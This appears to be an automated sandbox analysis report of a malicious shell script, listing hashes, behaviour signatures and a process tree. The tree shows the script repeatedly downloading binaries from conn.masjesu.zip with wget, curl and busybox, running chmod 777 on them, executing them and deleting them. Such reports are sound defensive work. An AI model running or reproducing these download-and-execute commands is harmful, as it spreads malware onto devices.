Analysis
-
max time kernel
81s -
max time network
80s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
-
Size
10KB
-
MD5
4ea5706fdd75f148d2bf38bc0ca8bf54
-
SHA1
57a2af30643d8facb455bb90086386308bdbb582
-
SHA256
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5
-
SHA512
a5c858e9af5b42bd2697b799f540c3b6530a4ec5380ce173d60ec5beca09f09415ee0d614f4aa71a45fc2bb557c8293c214856b055e07317d64045d5959448f3
-
SSDEEP
96:YmWF4N4N4fw0n3LiLBoBkBoiYo75v5D5oP3uZLCaLsLJ6JyJDyunue0EQEMEQddm:yW8Q137Qdd3Ak8YHqa437Qddv8YHqa56
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:710
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:736
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:739
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:750
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:760
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:771
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:784
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:807
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:853
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:870
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:912
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:926
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:982
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1003
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1006
-
Network
